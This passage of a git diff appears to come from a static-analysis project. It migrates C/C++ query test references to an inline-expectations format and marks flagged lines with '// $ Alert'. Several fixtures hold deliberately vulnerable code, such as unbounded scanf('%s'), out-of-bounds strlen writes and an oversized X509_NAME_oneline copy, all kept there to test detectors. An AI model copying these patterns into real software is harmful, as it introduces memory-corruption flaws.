experimental/Security/CWE/CWE-783/OperatorPrecedenceLogicErrorWhenUseBoolType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.c index a204aa4db29e..1fb546aa6965 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.c @@ -13,15 +13,15 @@ void strlen_test1(){ struct buffers buffAll; struct buffers * buffAll1; - buff1[strlen(buff1)]=0; // BAD - buffAll.array[strlen(buffAll.array)]=0; // BAD - buffAll.pointer[strlen(buffAll.pointer)]=0; // BAD - buffAll1->array[strlen(buffAll1->array)]=0; // BAD - buffAll1->pointer[strlen(buffAll1->pointer)]=0; // BAD - globalBuff1.array[strlen(globalBuff1.array)]=0; // BAD - globalBuff1.pointer[strlen(globalBuff1.pointer)]=0; // BAD - globalBuff2->array[strlen(globalBuff2->array)]=0; // BAD - globalBuff2->pointer[strlen(globalBuff2->pointer)]=0; // BAD + buff1[strlen(buff1)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + buffAll.array[strlen(buffAll.array)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + buffAll.pointer[strlen(buffAll.pointer)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + buffAll1->array[strlen(buffAll1->array)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + buffAll1->pointer[strlen(buffAll1->pointer)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + globalBuff1.array[strlen(globalBuff1.array)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + globalBuff1.pointer[strlen(globalBuff1.pointer)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + globalBuff2->array[strlen(globalBuff2->array)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] + globalBuff2->pointer[strlen(globalBuff2->pointer)]=0; // BAD // $ Alert[cpp/access-memory-location-after-end-buffer-strlen] } void strlen_test2(){ diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.cpp index f08d2a45757f..7f12385e68f0 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-788/semmle/tests/test.cpp @@ -7,13 +7,13 @@ void testFunction() int i1,i2,i3; bool b1,b2,b3; char c1,c2,c3; - b1 = -b2; //BAD + b1 = -b2; //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] b1 = !b2; //GOOD - b1++; //BAD - ++b1; //BAD - if(i1=tmpFunc()!=i2) //BAD + b1++; //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] + ++b1; //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] + if(i1=tmpFunc()!=i2) //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] return; - if(i1=tmpFunc()!=11) //BAD + if(i1=tmpFunc()!=11) //BAD // $ Alert[cpp/operator-precedence-logic-error-when-use-bool-type] return; if((i1=tmpFunc())!=i2) //GOOD return; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/BufferAccessWithIncorrectLengthValue.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/BufferAccessWithIncorrectLengthValue.qlref index 6cbb55272112..e92957d34a80 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/BufferAccessWithIncorrectLengthValue.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/BufferAccessWithIncorrectLengthValue.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-805/BufferAccessWithIncorrectLengthValue.ql +query: experimental/Security/CWE/CWE-805/BufferAccessWithIncorrectLengthValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/test.cpp index 26c33abab65d..6ba895650472 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-805/semmle/tests/test.cpp @@ -24,7 +24,7 @@ bool badTest1(SSL *ssl,char *text) char buf[256]; if( peer = SSL_get_peer_certificate(ssl)) { - X509_NAME_oneline(X509_get_subject_name(peer),buf,1024); // BAD + X509_NAME_oneline(X509_get_subject_name(peer),buf,1024); // BAD // $ Alert if((char*)strcasestr(buf,text)) return true; } return false; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.cpp index 09506cbc0878..1c0f53829356 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.cpp @@ -16,7 +16,7 @@ int main(int argc, char **argv) // BAD, do not use scanf without specifying a length first char buf1[10]; - scanf("%s", buf1); + scanf("%s", buf1); // $ Alert // GOOD, length is specified. The length should be one less than the size of the destination buffer, since the last character is the NULL terminator. char buf2[20]; @@ -25,7 +25,7 @@ int main(int argc, char **argv) // BAD, do not use scanf without specifying a length first char file[10]; - fscanf(file, "%s", buf2); + fscanf(file, "%s", buf2); // $ Alert // GOOD, with 'sscanf' the input can be checked first and enough room allocated [FALSE POSITIVE] if (argc >= 1) @@ -33,7 +33,7 @@ int main(int argc, char **argv) char *src = argv[0]; char *dest = (char *)malloc(strlen(src) + 1); - sscanf(src, "%s", dest); + sscanf(src, "%s", dest); // $ Alert } return 0; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.qlref index 428d988a161d..b8d5ea8dbe32 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/semmle/tests/MemoryUnsafeFunctionScan.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-120/MemoryUnsafeFunctionScan.ql \ No newline at end of file +query: experimental/Security/CWE/CWE-120/MemoryUnsafeFunctionScan.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/library-tests/c11_generic/PrintAST.qlref b/cpp/ql/test/library-tests/c11_generic/PrintAST.qlref index 6f85a6dbe693..645e39136f5b 100644 --- a/cpp/ql/test/library-tests/c11_generic/PrintAST.qlref +++ b/cpp/ql/test/library-tests/c11_generic/PrintAST.qlref @@ -1 +1 @@ -semmle/code/cpp/PrintAST.ql +query: semmle/code/cpp/PrintAST.ql diff --git a/cpp/ql/test/library-tests/conversions/consistency.qlref b/cpp/ql/test/library-tests/conversions/consistency.qlref index 183c1b1ffe14..e4b883a499af 100644 --- a/cpp/ql/test/library-tests/conversions/consistency.qlref +++ b/cpp/ql/test/library-tests/conversions/consistency.qlref @@ -1 +1 @@ -semmle/code/cpp/ASTConsistency.ql +query: semmle/code/cpp/ASTConsistency.ql diff --git a/cpp/ql/test/library-tests/extraction_errors/CompilerErrors.qlref b/cpp/ql/test/library-tests/extraction_errors/CompilerErrors.qlref index fd0c287c00dc..85408a38cdfe 100644 --- a/cpp/ql/test/library-tests/extraction_errors/CompilerErrors.qlref +++ b/cpp/ql/test/library-tests/extraction_errors/CompilerErrors.qlref @@ -1 +1 @@ -Telemetry/CompilerErrors.ql +query: Telemetry/CompilerErrors.ql diff --git a/cpp/ql/test/library-tests/extraction_errors/DatabaseQuality.qlref b/cpp/ql/test/library-tests/extraction_errors/DatabaseQuality.qlref index b2c536f00d70..9e81d9d21602 100644 --- a/cpp/ql/test/library-tests/extraction_errors/DatabaseQuality.qlref +++ b/cpp/ql/test/library-tests/extraction_errors/DatabaseQuality.qlref @@ -1 +1 @@ -Telemetry/DatabaseQuality.ql +query: Telemetry/DatabaseQuality.ql diff --git a/cpp/ql/test/library-tests/extraction_errors/ExtractionMetrics.qlref b/cpp/ql/test/library-tests/extraction_errors/ExtractionMetrics.qlref index 80547fdfd981..1e0348487e8a 100644 --- a/cpp/ql/test/library-tests/extraction_errors/ExtractionMetrics.qlref +++ b/cpp/ql/test/library-tests/extraction_errors/ExtractionMetrics.qlref @@ -1 +1 @@ -Telemetry/ExtractionMetrics.ql \ No newline at end of file +query: Telemetry/ExtractionMetrics.ql diff --git a/cpp/ql/test/library-tests/extraction_errors/SucceededIncludes.qlref b/cpp/ql/test/library-tests/extraction_errors/SucceededIncludes.qlref index 055b6af49a75..949a011697de 100644 --- a/cpp/ql/test/library-tests/extraction_errors/SucceededIncludes.qlref +++ b/cpp/ql/test/library-tests/extraction_errors/SucceededIncludes.qlref @@ -1 +1 @@ -Telemetry/SucceededIncludes.ql +query: Telemetry/SucceededIncludes.ql diff --git a/cpp/ql/test/library-tests/ir/ir/aliased_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ir/aliased_ssa_consistency_unsound.qlref index 0c9100ea0432..4e659ed8cc91 100644 --- a/cpp/ql/test/library-tests/ir/ir/aliased_ssa_consistency_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ir/aliased_ssa_consistency_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/ir/ir/aliased_ssa_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ir/aliased_ssa_ssa_consistency_unsound.qlref index d0a29f0641af..11a9e601a070 100644 --- a/cpp/ql/test/library-tests/ir/ir/aliased_ssa_ssa_consistency_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ir/aliased_ssa_ssa_consistency_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/aliased_ssa/internal/SSAConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/aliased_ssa/internal/SSAConsistency.ql diff --git a/cpp/ql/test/library-tests/ir/ir/raw_consistency.qlref b/cpp/ql/test/library-tests/ir/ir/raw_consistency.qlref index eb7cc77b3164..6c4fdc743eb7 100644 --- a/cpp/ql/test/library-tests/ir/ir/raw_consistency.qlref +++ b/cpp/ql/test/library-tests/ir/ir/raw_consistency.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/raw/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/raw/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_consistency_unsound.qlref index 1d0a35439328..a7c519f7dcd2 100644 --- a/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_consistency_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_consistency_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_ssa_consistency_unsound.qlref index fd03efbc2674..3ac4894b14eb 100644 --- a/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_ssa_consistency_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ir/unaliased_ssa_ssa_consistency_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/unaliased_ssa/internal/SSAConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/unaliased_ssa/internal/SSAConsistency.ql diff --git a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_consistency_unsound.qlref index 0c9100ea0432..4e659ed8cc91 100644 --- a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_consistency_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_consistency_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ir_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ir_unsound.qlref index 7d4b2950a35a..981d95d44004 100644 --- a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ir_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ir_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/PrintIR.ql \ No newline at end of file +query: semmle/code/cpp/ir/PrintIR.ql diff --git a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ssa_consistency_unsound.qlref index d0a29f0641af..11a9e601a070 100644 --- a/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ssa_consistency_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ssa/aliased_ssa_ssa_consistency_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/aliased_ssa/internal/SSAConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/aliased_ssa/internal/SSAConsistency.ql diff --git a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_consistency_unsound.qlref index 1d0a35439328..a7c519f7dcd2 100644 --- a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_consistency_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_consistency_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ir_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ir_unsound.qlref index 3f7764440366..ad25a00416be 100644 --- a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ir_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ir_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/unaliased_ssa/PrintIR.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/unaliased_ssa/PrintIR.ql diff --git a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ssa_consistency_unsound.qlref b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ssa_consistency_unsound.qlref index fd03efbc2674..3ac4894b14eb 100644 --- a/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ssa_consistency_unsound.qlref +++ b/cpp/ql/test/library-tests/ir/ssa/unaliased_ssa_ssa_consistency_unsound.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/unaliased_ssa/internal/SSAConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/unaliased_ssa/internal/SSAConsistency.ql diff --git a/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.c b/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.c index 8f76cdb42f20..4c91a819add6 100644 --- a/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.c +++ b/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.c @@ -6,11 +6,11 @@ void f(void) { long long int z; z = (long long int)p1; // OK: long long int is big enough - i = (short int)p2; // Bad: short is too small + i = (short int)p2; // Bad: short is too small // $ Alert i = (short int)(long long int)p3; // OK: we assume they know what // they are doing if they go // via a large-enough type - i = (short int)(void *)p4; // Bad: Going via a pointer type is + i = (short int)(void *)p4; // Bad: Going via a pointer type is // $ Alert // not convincing } diff --git a/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.qlref b/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.qlref index d202b53c6aa6..69e313c34ee4 100644 --- a/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.qlref +++ b/cpp/ql/test/library-tests/lossy_pointer_cast/lossy_pointer_cast.qlref @@ -1 +1,2 @@ -Likely Bugs/Conversion/LossyPointerCast.ql +query: Likely Bugs/Conversion/LossyPointerCast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/library-tests/subscript_operator/PrintAST.qlref b/cpp/ql/test/library-tests/subscript_operator/PrintAST.qlref index 6fcb30ac7a6e..645e39136f5b 100644 --- a/cpp/ql/test/library-tests/subscript_operator/PrintAST.qlref +++ b/cpp/ql/test/library-tests/subscript_operator/PrintAST.qlref @@ -1 +1 @@ -semmle/code/cpp/PrintAST.ql \ No newline at end of file +query: semmle/code/cpp/PrintAST.ql diff --git a/cpp/ql/test/library-tests/syntax-zoo/aliased_ssa_consistency.qlref b/cpp/ql/test/library-tests/syntax-zoo/aliased_ssa_consistency.qlref index 0c9100ea0432..4e659ed8cc91 100644 --- a/cpp/ql/test/library-tests/syntax-zoo/aliased_ssa_consistency.qlref +++ b/cpp/ql/test/library-tests/syntax-zoo/aliased_ssa_consistency.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/syntax-zoo/raw_consistency.qlref b/cpp/ql/test/library-tests/syntax-zoo/raw_consistency.qlref index eb7cc77b3164..6c4fdc743eb7 100644 --- a/cpp/ql/test/library-tests/syntax-zoo/raw_consistency.qlref +++ b/cpp/ql/test/library-tests/syntax-zoo/raw_consistency.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/raw/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/raw/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/syntax-zoo/unaliased_ssa_consistency.qlref b/cpp/ql/test/library-tests/syntax-zoo/unaliased_ssa_consistency.qlref index 1d0a35439328..a7c519f7dcd2 100644 --- a/cpp/ql/test/library-tests/syntax-zoo/unaliased_ssa_consistency.qlref +++ b/cpp/ql/test/library-tests/syntax-zoo/unaliased_ssa_consistency.qlref @@ -1 +1 @@ -semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql \ No newline at end of file +query: semmle/code/cpp/ir/implementation/unaliased_ssa/IRConsistency.ql diff --git a/cpp/ql/test/library-tests/types/integral_types_ms/integral_type.qlref b/cpp/ql/test/library-tests/types/integral_types_ms/integral_type.qlref index e5e0e3cdf432..6b61b46a179a 100644 --- a/cpp/ql/test/library-tests/types/integral_types_ms/integral_type.qlref +++ b/cpp/ql/test/library-tests/types/integral_types_ms/integral_type.qlref @@ -1 +1 @@ -../integral_types/integral_type.ql +query: ../integral_types/integral_type.ql diff --git a/cpp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/cpp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref index 9d7833eccae7..dc898fca718c 100644 --- a/cpp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref +++ b/cpp/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref @@ -1 +1 @@ -AlertSuppression.ql +query: AlertSuppression.ql diff --git a/cpp/ql/test/query-tests/Architecture/FeatureEnvy/FeatureEnvy.qlref b/cpp/ql/test/query-tests/Architecture/FeatureEnvy/FeatureEnvy.qlref index cbb26c9c3bf3..0c7c0f33b1eb 100644 --- a/cpp/ql/test/query-tests/Architecture/FeatureEnvy/FeatureEnvy.qlref +++ b/cpp/ql/test/query-tests/Architecture/FeatureEnvy/FeatureEnvy.qlref @@ -1 +1,2 @@ -Architecture/FeatureEnvy.ql +query: Architecture/FeatureEnvy.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Architecture/FeatureEnvy/a.cpp b/cpp/ql/test/query-tests/Architecture/FeatureEnvy/a.cpp index 588364e73096..059908b34869 100644 --- a/cpp/ql/test/query-tests/Architecture/FeatureEnvy/a.cpp +++ b/cpp/ql/test/query-tests/Architecture/FeatureEnvy/a.cpp @@ -7,7 +7,7 @@ void local3(void) { } void local4(void) { } void local5(void) { } -void f1(void) { +void f1(void) { // $ Alert g(); h(); i(); @@ -15,7 +15,7 @@ void f1(void) { k(); } -void f2(void) { +void f2(void) { // $ Alert local1(); g(); h(); @@ -45,7 +45,7 @@ void f4(void) { j(); } -void f5(void) { +void f5(void) { // $ Alert MyClass m; m.mg(); diff --git a/cpp/ql/test/query-tests/Architecture/InappropriateIntimacy/InappropriateIntimacy.qlref b/cpp/ql/test/query-tests/Architecture/InappropriateIntimacy/InappropriateIntimacy.qlref index dc7e4d5cd054..18947060c368 100644 --- a/cpp/ql/test/query-tests/Architecture/InappropriateIntimacy/InappropriateIntimacy.qlref +++ b/cpp/ql/test/query-tests/Architecture/InappropriateIntimacy/InappropriateIntimacy.qlref @@ -1 +1 @@ -Architecture/InappropriateIntimacy.ql +query: Architecture/InappropriateIntimacy.ql diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.cpp b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.cpp index 374ad8b6337b..183cae6b6906 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.cpp +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.cpp @@ -6,12 +6,12 @@ struct aa { TEN(int_f) - TEN(int_g) + TEN(int_g) // $ Alert }; class bb { TEN(int_f) - TEN(int_g) + TEN(int_g) // $ Alert }; union cc_not_flagged_up_because_unions_are_not_classes_in_this_sense { @@ -22,13 +22,13 @@ union cc_not_flagged_up_because_unions_are_not_classes_in_this_sense { template struct dd { TEN(int_f) - TEN(int_g) + TEN(int_g) // $ Alert }; template struct ee { TEN(int_f) - TEN(int_g) + TEN(int_g) // $ Alert }; void instantiate() { @@ -54,10 +54,10 @@ struct MyParticle { unsigned char r2, g2, b2, a2; class texture *tex; - float u1, v1, u2, v2; + float u1, v1, u2, v2; // $ Alert }; -struct MyAlphaClass1 { +struct MyAlphaClass1 { // $ Alert int a1, b1, c1, d1, e1, f1, g1, h1, i1, j1; int k1, l1, m1, n1, o1, p1, q1, r1, s1, t1; int u1, v1, w1, x1, y1, z1; @@ -71,7 +71,7 @@ struct MyAlphaClass1 { int u2, v2, w2, x2, y2, z2; }; -struct MyAlphaClass2 { +struct MyAlphaClass2 { // $ Alert int x; // ... diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.qlref b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.qlref index 1afc89cceef6..6d9540acb23f 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.qlref +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/cwmf.qlref @@ -1 +1,2 @@ -Architecture/Refactoring Opportunities/ClassesWithManyFields.ql +query: Architecture/Refactoring Opportunities/ClassesWithManyFields.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/different_types.h b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/different_types.h index 3e2a6c6e4ced..11aea5dc11c0 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/different_types.h +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ClassesWithManyFields/different_types.h @@ -30,6 +30,6 @@ class DifferentTypes2 { int j6; int j7; int j8; - int j9; + int j9; // $ Alert }; diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/ComplexFunctions.qlref b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/ComplexFunctions.qlref index 22bc3d276639..a00aeaa47cf4 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/ComplexFunctions.qlref +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/ComplexFunctions.qlref @@ -1 +1,2 @@ -Architecture/Refactoring Opportunities/ComplexFunctions.ql +query: Architecture/Refactoring Opportunities/ComplexFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/complex.c b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/complex.c index 6499a1bc38de..be209ddbf459 100644 --- a/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/complex.c +++ b/cpp/ql/test/query-tests/Architecture/Refactoring Opportunities/ComplexFunctions/complex.c @@ -11,7 +11,7 @@ void g(void) { f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); } -void h(void) { +void h(void) { // $ Alert f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); f(); diff --git a/cpp/ql/test/query-tests/Best Practices/GuardedFree/GuardedFree.qlref b/cpp/ql/test/query-tests/Best Practices/GuardedFree/GuardedFree.qlref index d64671f08c33..8abe92507f2a 100644 --- a/cpp/ql/test/query-tests/Best Practices/GuardedFree/GuardedFree.qlref +++ b/cpp/ql/test/query-tests/Best Practices/GuardedFree/GuardedFree.qlref @@ -1 +1,2 @@ -Best Practices/GuardedFree.ql +query: Best Practices/GuardedFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/GuardedFree/test.cpp b/cpp/ql/test/query-tests/Best Practices/GuardedFree/test.cpp index d52bcef72d16..04b6cc061d4d 100644 --- a/cpp/ql/test/query-tests/Best Practices/GuardedFree/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/GuardedFree/test.cpp @@ -2,12 +2,12 @@ extern "C" void free(void *ptr); extern "C" int strcmp(const char *s1, const char *s2); void test0(int *x) { - if (x) // BAD + if (x) // BAD // $ Alert free(x); } void test1(int *x) { - if (x) { // BAD + if (x) { // BAD // $ Alert free(x); } } @@ -39,14 +39,14 @@ bool test4(char *x, char *y) { void test5(char *x) { if (x) *x = 42; - if (x) { // BAD + if (x) { // BAD // $ Alert free(x); } } void test6(char *x) { *x = 42; - if (x) { // BAD + if (x) { // BAD // $ Alert free(x); } } @@ -103,7 +103,7 @@ bool test12(char *x) { } void test13(char *x) { - if (x != nullptr) // BAD + if (x != nullptr) // BAD // $ Alert free(x); } diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/DeclarationHidesParameter.qlref b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/DeclarationHidesParameter.qlref index c3e02ee7f47d..339ba0c68884 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/DeclarationHidesParameter.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/DeclarationHidesParameter.qlref @@ -1 +1,2 @@ -Best Practices/Hiding/DeclarationHidesParameter.ql +query: Best Practices/Hiding/DeclarationHidesParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/hiding.cpp b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/hiding.cpp index 0b08a0ae612f..4aa7effb0fb0 100644 --- a/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/hiding.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Hiding/DeclarationHidesParameter/hiding.cpp @@ -1,7 +1,7 @@ void f(int ii) { if (1) { - for(int ii = 1; ii < 10; ii++) { // local variable hides parameter of the same name + for(int ii = 1; ii < 10; ii++) { // local variable hides parameter of the same name // $ Alert ; } } @@ -12,7 +12,7 @@ namespace foo { void f2(int ii, int kk) { try { for (ii = 0; ii < 3; ii++) { - int kk; // local variable hides parameter of the same name + int kk; // local variable hides parameter of the same name // $ Alert } } catch (int ee) { @@ -25,7 +25,7 @@ void myFunction(int a, int b, int c); void myFunction(int a, int b, int _c) { { - int a = a; // local variable hides parameter of the same name + int a = a; // local variable hides parameter of the same name // $ Alert int _b = b; int c = _c; @@ -42,7 +42,7 @@ class MyTemplateClass { template void MyTemplateClass :: myMethod(int a, int b, int _c) { { - int a = a; // local variable hides parameter of the same name + int a = a; // local variable hides parameter of the same name // $ Alert int _b = b; int c = _c; @@ -61,7 +61,7 @@ void test() { void testMacro(int i) { 